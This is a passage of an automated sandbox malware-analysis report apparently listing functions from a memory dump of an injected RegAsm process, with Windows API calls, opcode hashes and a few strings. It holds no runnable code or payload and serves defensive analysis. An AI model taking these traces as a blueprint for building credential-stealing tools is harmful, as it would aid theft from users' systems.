                                                          • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Temp$DirectoryFileNamePathWindows
                                                          • String ID:
                                                          • API String ID: 1125800050-0
                                                          • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                          • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                          • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                          • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                          Strings
                                                          • failed memory resize %u to %u bytes, xrefs: 00415358
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: realloc
                                                          • String ID: failed memory resize %u to %u bytes
                                                          • API String ID: 471065373-2134078882
                                                          • Opcode ID: e5ae129d454b891eada76ccbfa458d0a6592737a0e8831e28bd7d44ced5f0510
                                                          • Instruction ID: af22f86c8d97814ed0bf188a45fefa7fc909daabc8cee38fca791e75313f3e85
                                                          • Opcode Fuzzy Hash: e5ae129d454b891eada76ccbfa458d0a6592737a0e8831e28bd7d44ced5f0510
                                                          • Instruction Fuzzy Hash: 49F027B3A01605A7D2109A55DC418CBF3DCDFC4655B06082FF998D3201E168E88083B6
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: d
                                                          • API String ID: 0-2564639436
                                                          • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                          • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                          • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                          • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset
                                                          • String ID: BINARY
                                                          • API String ID: 2221118986-907554435
                                                          • Opcode ID: 423c094908dc07756a2ef734edd9c41c0411f3bff0f864234720e07ca5cd074c
                                                          • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                          • Opcode Fuzzy Hash: 423c094908dc07756a2ef734edd9c41c0411f3bff0f864234720e07ca5cd074c
                                                          • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                          APIs
                                                            • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                            • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                          • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 00410654
                                                            • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                            • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                            • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                            • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                                                          • String ID:
                                                          • API String ID: 1161345128-0
                                                          • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                          • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                          • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                          • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _wcsicmp
                                                          • String ID: /stext
                                                          • API String ID: 2081463915-3817206916
                                                          • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                          • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                          • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                          • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                          APIs
                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                          • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                            • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                            • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                          • FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                            • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: File$ByteCharMultiWide$??2@??3@ChangeCloseCreateFindNotificationReadSize
                                                          • String ID:
                                                          • API String ID: 159017214-0
                                                          • Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                          • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                          • Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                          • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                          APIs
                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                          • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                          • String ID:
                                                          • API String ID: 3150196962-0
                                                          • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                          • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                          • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                          • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                          Strings
                                                          • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: malloc
                                                          • String ID: failed to allocate %u bytes of memory
                                                          • API String ID: 2803490479-1168259600
                                                          • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                          • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                          • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                          • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??3@
                                                          • String ID:
                                                          • API String ID: 613200358-0
                                                          • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                          • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                          • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                          • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memcmpmemset
                                                          • String ID:
                                                          • API String ID: 1065087418-0
                                                          • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                          • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                          • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                          • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset
                                                          • String ID:
                                                          • API String ID: 2221118986-0
                                                          • Opcode ID: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                          • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                                          • Opcode Fuzzy Hash: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                          • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                                          APIs
                                                            • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                            • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                            • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                            • Part of subcall function 0040A02C: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                          • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: File$Time$ChangeCloseCompareCreateFindNotificationmemset
                                                          • String ID:
                                                          • API String ID: 1481295809-0
                                                          • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                          • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                          • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                          • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                          APIs
                                                            • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                          • String ID:
                                                          • API String ID: 3150196962-0
                                                          • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                          • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                          • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                          • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                          APIs
                                                          • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: File$PointerRead
                                                          • String ID:
                                                          • API String ID: 3154509469-0
                                                          • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                          • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                          • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                          • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                          APIs
                                                          • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                            • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                            • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                            • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfile$StringWrite_itowmemset
                                                          • String ID:
                                                          • API String ID: 4232544981-0
                                                          • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                          • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                          • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                          • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                          APIs
                                                          • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: FreeLibrary
                                                          • String ID:
                                                          • API String ID: 3664257935-0
                                                          • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                          • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                          • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                          • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                          APIs
                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                          • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$FileModuleName
                                                          • String ID:
                                                          • API String ID: 3859505661-0
                                                          • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                          • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                          • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                          • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                          APIs
                                                          • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                          • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                          • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                          • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                          APIs
                                                          • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: FileWrite
                                                          • String ID:
                                                          • API String ID: 3934441357-0
                                                          • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                          • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                          • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                          • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                          APIs
                                                          • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: FreeLibrary
                                                          • String ID:
                                                          • API String ID: 3664257935-0
                                                          • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                          • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                          • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                          • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??3@
                                                          • String ID:
                                                          • API String ID: 613200358-0
                                                          • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                          • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                          • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                          • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                          APIs
                                                          • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                          • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                          • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                          • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                          APIs
                                                          • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                          • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                          • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                          • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??3@
                                                          • String ID:
                                                          • API String ID: 613200358-0
                                                          • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                          • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                          • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                          • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??3@
                                                          • String ID:
                                                          • API String ID: 613200358-0
                                                          • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                          • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                          • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                          • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                          APIs
                                                          • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: FreeLibrary
                                                          • String ID:
                                                          • API String ID: 3664257935-0
                                                          • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
